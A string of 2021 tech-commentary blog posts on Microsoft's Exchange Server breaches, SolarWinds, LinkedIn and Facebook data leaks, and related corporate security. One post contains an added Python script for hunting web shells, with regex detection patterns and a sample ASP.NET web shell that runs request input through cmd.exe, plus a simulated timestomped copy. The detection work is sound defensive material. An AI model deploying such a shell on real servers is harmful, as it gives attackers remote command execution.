Facebook and Microsoft: Communing with the Spirit of Security

April 7, 2021

Two apparently unrelated actions by bad actors. Two paragons of user security. Two. Count ‘em.

The first incident is summarized in “Huge Facebook Leak That Contains Information about 500 Million People Came from Abuse of Contacts Tool, Company Says.” The main point is that flawed software and bad actors were responsible. But 500 million. Where is Alex Stamos when Facebook needs guru-grade security to zoom into a challenge?

The second incident is explained in “Half a Billion LinkedIn Users Have Scraped Data Sold Online.” Microsoft, the creator of the super useful Defender security system, owns LinkedIn. (How is that migration to Azure coming along?) Microsoft has been a very minor character in the great works of 2021. These are, of course, The Taming of SolarWinds and The Rape of Exchange Server.

Now what’s my point? I think when one adds 500 million and 500 million the result is a lot of people. Assume 25 percent overlap. Well, that’s still a lot of people’s information which has taken wing.

Indifference? Carelessness? Cluelessness? A lack of governance? I would suggest that a combination of charming personal characteristics makes those responsible individuals one can trust with sensitive information.

Yep, trust and credibility. Important.

Stephen E Arnold, April 7, 2021

MSFT Exchange Excitement: Another Jolt of Info

March 30, 2021

I read “Exchange Server Attacks: Microsoft Shares Intelligence on Post-Compromise Activities.” Interesting. Weeks, maybe longer, have passed since what one of my analysts described as another digital Chernobyl, without much substantive information.

This “real” news story reports:

Microsoft is raising an alarm over potential follow-on attacks targeting already compromised Exchange servers, especially if the attackers used web shell scripts to gain persistence on the server, or where the attacker stole credentials during earlier attacks.

Interesting. A massive attack which may have distributed malware, possibly as yet undetected, poses a risk. That’s good to know.

This statement attributed to Microsoft is intriguing as well:

In a new blog post, Microsoft reiterated its warning that “patching a system does not necessarily remove the access of the attacker”.

Does this mean that Microsoft’s remediation is not fixing the “problem”? The patch closes the entry point but does nothing about what an attacker left behind: a web shell dropped into the web root or credentials stolen earlier keep working on a patched server until someone finds and removes them. What sorts of malware could be lurking? Microsoft provides some measured answers to this particular question in “Analyzing Attacks Taking Advantage of the Exchange Server Vulnerabilities.”
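The post-compromise point above is the one worth acting on: once the update is installed, the remaining work is a hunt for what was planted before the patch. The following is an added example, not code from the original post or from Microsoft, of the simplest form of that hunt. It walks a web root, looks at server-side script files, and flags those carrying two or more traits typical of a web shell (reading a request parameter, spawning a process, evaluating code, loading an assembly, or a server-side script block). The patch date, the directory layout and the file contents are all constructed for the demonstration; on a real server you would point it at the Exchange and IIS web roots and use the actual update install time.

```python
"""Added example: a post-patch web shell hunt over a web root.

Not the original post's or Microsoft's code. The patch date, directory
names and file contents below are constructed for the demonstration.
"""
import os
import re
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Assumed install time of the Exchange security update; on a real server
# take this from the update history rather than hard-coding it.
PATCHED_AT = datetime(2021, 3, 2, tzinfo=timezone.utc)

# Heuristic traits of simple ASP.NET web shells. None alone proves anything
# (legitimate pages read Request parameters), so a finding needs two or more.
SHELL_MARKERS = {
    "request_param": re.compile(r'Request\s*[\.\[]\s*["\']?\w+', re.I),
    "process_start": re.compile(r'Process\.Start|ProcessStartInfo', re.I),
    "eval": re.compile(r'\beval\b', re.I),
    "assembly_load": re.compile(r'Assembly\.Load', re.I),
    "server_script": re.compile(r'<script[^>]*runat\s*=\s*["\']server', re.I),
}
SCANNED_SUFFIXES = {".aspx", ".ashx", ".asmx"}


def score_content(text):
    """Names of the shell markers present in one file's text."""
    return [name for name, rx in SHELL_MARKERS.items() if rx.search(text)]


def hunt_web_shells(web_root, patched_at=PATCHED_AT, min_markers=2):
    """Flag server-side script files under web_root carrying at least
    min_markers shell traits. With patched_at set, only files modified at or
    after that time are examined, on the theory that nothing legitimate lands
    in a web root after the patch. Pass patched_at=None to scan everything:
    an attacker can backdate a file's timestamp, so the date filter is a
    convenience for triage, not a guarantee."""
    findings = []
    for path in sorted(Path(web_root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCANNED_SUFFIXES:
            continue
        modified = datetime.fromtimestamp(path.stat().st_mtime, tz=timezone.utc)
        if patched_at is not None and modified < patched_at:
            continue
        markers = score_content(path.read_text(errors="ignore"))
        if len(markers) >= min_markers:
            findings.append({"name": path.name, "path": str(path),
                             "modified": modified.isoformat(), "markers": markers})
    return findings


def build_sample_web_root():
    """Constructed web root: one harmless page that reads a parameter, one
    freshly dropped shell, and one copy of the shell with a backdated mtime."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    (root / "owa" / "auth").mkdir(parents=True)
    (root / "aspnet_client").mkdir()
    (root / "owa" / "auth" / "logon.aspx").write_text(
        '<%@ Page Language="C#" %>\n'
        '<p>Hello <%= Server.HtmlEncode(Request["user"] ?? "") %></p>\n')
    shell = ('<%@ Page Language="C#" %>\n'
             '<script runat="server">\n'
             'void Page_Load(object s, EventArgs e) {\n'
             '  System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["c"]);\n'
             '}\n</script>\n')
    (root / "aspnet_client" / "shell.aspx").write_text(shell)
    old = root / "aspnet_client" / "timestomped.aspx"
    old.write_text(shell)
    past = datetime(2020, 1, 1, tzinfo=timezone.utc).timestamp()
    os.utime(old, (past, past))  # simulate the attacker backdating the file
    return root


if __name__ == "__main__":
    root = build_sample_web_root()
    print("modified after patch:", [f["name"] for f in hunt_web_shells(root)])
    print("all files:", [f["name"] for f in hunt_web_shells(root, patched_at=None)])
```

The date-filtered pass finds only the freshly dropped shell; the backdated copy surfaces only when the filter is off, which is why a real hunt should not stop at timestamps. Stolen credentials, the other persistence route the quoted warning names, leave no file to scan for at all; those call for rotation and a review of authentication logs, not a file walk.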

But the problem is that Microsoft’s foundational software build and deploy business process seems to be insecure.

Dribs and drabs of information about the consequences of a major security breach are PR and hand waving, not the actions I craved.

Stephen E Arnold, March 30, 2021

Exchange Servers: Not Out of the Dog House Yet

March 25, 2021

Here’s a chilling statement I spotted in “Microsoft Servers Being Hacked Faster Than Anyone Can Count”:

This free-for-all [Exchange Server] attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic “script kiddies”… Because access is so easy, you can assume that the majority of these environments have been breached.

The statement is attributed to Antti Laatikainen, senior security consultant at the cyber security firm F-Secure.

Is this accurate?

The ever fascinating digital publication Windows Central ran a story with a headline that offers a different point of view: “Microsoft Says 92% of Exchange Servers Have Been Patched or Mitigated.”

The discussion about these different views raises a number of questions:

  • Does Microsoft want to remediate its business processes to make its products and services more secure? (More security means more difficulties for certain government agencies who use security as a way to achieve their objectives.)
  • Can security professionals be trusted to identify security problems or issues? (The SolarWinds misstep went undetected for months, maybe as much as two years, before information about the issue surfaced in a FireEye statement.)
  • Can continuous development and update processes deliver acceptable security? (The core business process may enlarge the attack surface with each fast-cycle change and deployment.)

How secure are “patched” Exchange servers? A very good question indeed.

Stephen E Arnold, March 25, 2021

High Tech Tension: Sparks Visible, Escalation Likely

March 25, 2021

I read Google’s “Our Ongoing Commitment to Supporting Journalism.” The write up is interesting because it seems to be a dig at a couple of other technology giants. The bone of contention is news, specifically, indexing and displaying it.

The write up begins with a remarkable statement:

Google has always been committed to providing high-quality and relevant information, and to supporting the news publishers who help create it.

This is a sentence pregnant with baby Googzillas. Note the word “always.” I am not certain that Google is in the “always” business, nor am I sure that the company had much commitment. As I recall, when Google News went live, it created some modest conversation. Then Google News was fenced out of the nuclear ad machinery. Over time, Google negotiated and kept on doing what feisty, mom and pop Silicon Valley companies do; namely, keep doing what they want and then ask for forgiveness.

Flash forward to Australia. That country wanted to get money in exchange for Australian news. Google made some growling noises, but in the end the company agreed to pay some money.

Facebook on the other hand resisted, turned off its service, and returned to the Australian negotiating table.

Where was Microsoft in this technical square dance?

Microsoft was a cheerleader for the forces of truth, justice, and the Microsoft way. This Google blog post strikes me as Google’s reminding Microsoft that Google wants to be the new Microsoft. Microsoft has not done itself any favors because the battle lines between these two giants are swathed in the cloud of business war.

Google has mobile devices. Microsoft has the enterprise. Google has the Chromebook. Microsoft has the Surface. And on it goes.

Now Microsoft is on the ropes: SolarWinds, the Exchange glitch, and wonky updates which have required the invention of KIR (Known Issue Rollback, a mechanism for reverting a bad update).

Microsoft may be a JEDI warrior with the feature-burdened Teams and the military’s go-to software PowerPoint. Google knows that every bump and scrape slows the reflexes of the Redmond giant.

Both mom and pop outfits are looking after each firm’s self interests. Fancy words and big ideas are window dressing.

Stephen E Arnold, March 25, 2021

Watching Hoops: Watching Microsoft Defensive Scramble

March 24, 2021

Air ball. I read “Microsoft Defender Will Automatically Prevent Exchange Server Exploits.” Technical foul! The write up contains this statement:

The tech giant warns, however, that this is just an interim mitigation meant to protect customers while they’re in the midst of implementing the comprehensive security update for Exchange it released earlier this month. 

Over and back!

The Redmond Wizards have great cheerleaders, but the opponents own the auditorium. The clock is ticking.

The Wizards’ coach is yelling at the officials. Oh, another technical foul.

Quick. Print out the play.

Wait, Microsoft Windows 10 updates broke the printer.

Whistle. Another technical foul.

Stephen E Arnold, March 24, 2021

Microsoft: Your Computer, Your Data. That Is a Good One

March 23, 2021

The online news stream is chock full of information about Microsoft’s swing-for-the-fences PR push for Discord. If you are not familiar with the service, I am not going to explain this conduit for those far more youthful than I. Like GitHub, Discord is going to be an interesting property if the Redmond crowd does the deal. If we anticipate Discord becoming part of the Xbox and Teams family, the alleged censorship of software posted to GitHub will be a glimpse of the content challenges in Microsoft’s future.

The more interesting development is the “real” news story “Microsoft Edge Could Soon Share Browsing Data with Windows 10.” The idea is that a person’s computer and the authorized users of the computing device will become one big, happy data family.

The article states:

Called share browsing data with other Windows features, it is designed to share data from Edge, such as Favorites or visited sites, with other Windows components. Search is a prime target, and highlighted by Microsoft at the time of writing. Basically, what this means is that users who run searches using the built-in search feature may get Edge results as well.

And what does Microsoft get? Possibilities include:

  • Federated, fine grained user behavior data
  • Click stream data matched to content on the user’s personal computer
  • Real-time information flows
  • Opportunities to share data with certain entities.

What happens to the user’s computer if said user does not accept such integration? The options range from loss of access to certain data to pro-active interaction to alter the functioning of the user’s computing device.

Why is this such a good idea? Microsoft, like Amazon, Facebook, and Google, realizes that the days of the Wild West are coming to an end. There are new sheriffs with new ideas about right and wrong.

Thus, get what one can while the gittin’ is good, as the old timers used to say.

But “What about security and privacy?” you ask? One response is, “That’s a good one.” Why not try stand up?

Stephen E Arnold, March 23, 2021

Microsoft Security: An Ominous Signification

March 22, 2021

IT News published “White House Taskforce Meets over Microsoft Software Weaknesses.” The “real news” story included a statement which I placed in the predictive bucket. Here’s the prose which caught my attention:

The security holes in the widely used mail and calendaring software leave the door open to industrial-scale cyber espionage, allowing malicious actors to steal emails virtually at will from vulnerable servers or to move elsewhere in the network.

Microsoft is pretty good at issuing magic fixes; for example, “Microsoft Releases One-Click Patch for Exchange Vulnerability” reveals:

Microsoft has released a one-click patch, the Microsoft Exchange On-Premises Mitigation tool, to help customers apply new security updates in the face of the Exchange Server cyber attack.

This IT Pro article points out:

ESET research found that Microsoft Exchange servers had been targeted by “at least ten hacker groups” and that they had managed to install backdoors on more than 5,000 servers in over 115 countries.

In this context the phrase “industrial scale cyber espionage” is doubly chilling.

Now about that JEDI contract for the US Department of Defense?

Stephen E Arnold, March 22, 2021

Microsoft Exchange After Action Action: Adulting or Covering Up?

March 12, 2021

I read “Researcher Publishes Code to Exploit Microsoft Exchange Vulnerabilities on GitHub.” The allegedly accurate “real” news report states:

On Wednesday, independent security researcher Nguyen Jang published on GitHub a proof-of-concept tool to hack Microsoft Exchange servers that combined two of those vulnerabilities. Essentially, he published code that could be used to hack Microsoft customers, exploiting a bug used by Chinese government hackers—on an open-source platform owned by Microsoft.

What happened?

Microsoft took down the hacking tool. “GitHub took down it,” the researcher told Motherboard in an email. “They just send [sic] me an email.” On Thursday, a GitHub spokesperson confirmed to Motherboard that the company removed the code due to the potential damage it could cause.

Interesting.

Two questions crossed my mind:

  1. Is Microsoft showing more management responsibility with regard to the data posted on GitHub? Editorial control is often useful, particularly when the outputting mechanism provides a wealth of information and code. Some of these items can be used to create issues. Microsoft purchased GitHub and may now be forced to take a more adult view of the service.
  2. Is Microsoft covering up the flaws in its core processes? After reading Microsoft’s explanations of the SolarWinds misstep, the injection of marketing spin and intriguing rhetoric about responsibility open the door to a bit of Home Depoting; that is, paint, wood panel, and a bit of carpet make an ageing condo look better.

Worth watching both the breaches which are concerning and the GitHub service which can cause some individuals’ brows to furrow.

Stephen E Arnold, March 12, 2021

Microsoft: Stunned by Its Own Insecure Petard?

March 12, 2021

I read “10 Key Microsoft Ignite Takeaways for CIOs.” Marketing fluff except for one wild and crazy statement. Here’s the passage I found amusing:

By midyear, enterprises will also be able to control in which datacenter Microsoft stores documents shared through Teams, group by group or even for individual users, making it more useful in some regulated industries or where there are concerns about the security of data. These controls will mirror those available for Exchange and SharePoint. There will also be an option to make end-to-end-encrypted one-to-one voice or video calls, that CIOs can enable on a per-employee basis, and to limit meeting attendance only to invited participants. A future update could see the addition of end-to-end encrypted meetings, too. For companies that are centralizing their investment in such collaboration, McQuire said, “Security is arguably the number one selection criterion.”

Assume this number one selection criterion is on the money. What’s the Microsoft security posture with SolarWinds and the Exchange breaches?

That petard packs quite a wallop, and it is not from marketing hoohah. There’s nothing like a marketing oriented conference to blow smoke to obfuscate the incredible security issues Microsoft has created. But conferences and marketing talk are easier than remediating the security problems.

Stephen E Arnold, March 12, 2021

LinkedIn: Social Media Excitement from the Softies

March 10, 2021

Microsoft is reportedly embracing the gig work mentality via LinkedIn, which it purchased in 2016. What could go wrong? Social Barrel tells us, “LinkedIn to Rival Fiverr and Upwork with Marketplaces.” The pandemic has greatly increased demand for independent workers, and it sounds like Microsoft refuses to cede the increased freelance-connection business to Upwork and Fiverr. Writer Ola Ric reveals:

“If true, the Microsoft-owned professional network service is all set to rival Fiverr and Upwork. Without a doubt, LinkedIn stands a big chance of rivaling Fiverr and Upwork considering its massive user base said to be around 740 million. The service is called Marketplaces according to The Information, and is already being developed. Apparently LinkedIn wants to explore a market, though small, but with potential for growth.”

Of course, many besides the self-employed are working remotely now, and many predict the trend will continue after the pandemic is in our rear view. This new reality means many new challenges for HR, and several employee management applications are being used to cope. Microsoft is also moving into this territory with its Viva platform, we learn from “The Arrival of ‘Enterprise Social’” at India’s BusinessWorld. Reporter Pradeep Kar elaborates:

“The opportunity is so big that Microsoft’s Chief Executive Satya Nadella went public, saying that the COVID-19 crisis would result in employee management applications that would outlast the pandemic. His company has quickly unveiled a new category of technology solutions called employee experience platforms (EXP) with Viva that ‘provides a single-entry point for employee engagement and internal communications.’ Microsoft calls Viva a gateway to the digital workplace. It includes human resource functions like payroll, tools to track employee performance, career development initiatives, etc. We know these employee engagement applications are not just good-to-have. They are critical. They allow organizations to keep employees connected, binding them to company goals and culture, improving productivity and loyalty.”

Microsoft’s Viva is not the only option, Kar informs us. He lists Darwinbox, ADP Workforce Now, ZohoPeople, and PeopleStrong as just a few of the many alternatives.

We note Microsoft continues to explore its options as new things come along, a practice that has kept it in business since 1975. We wonder, though: Could this timing be a way to distract from the company’s part in the SolarWinds fiasco?

Cynthia Murrell, March 10, 2021
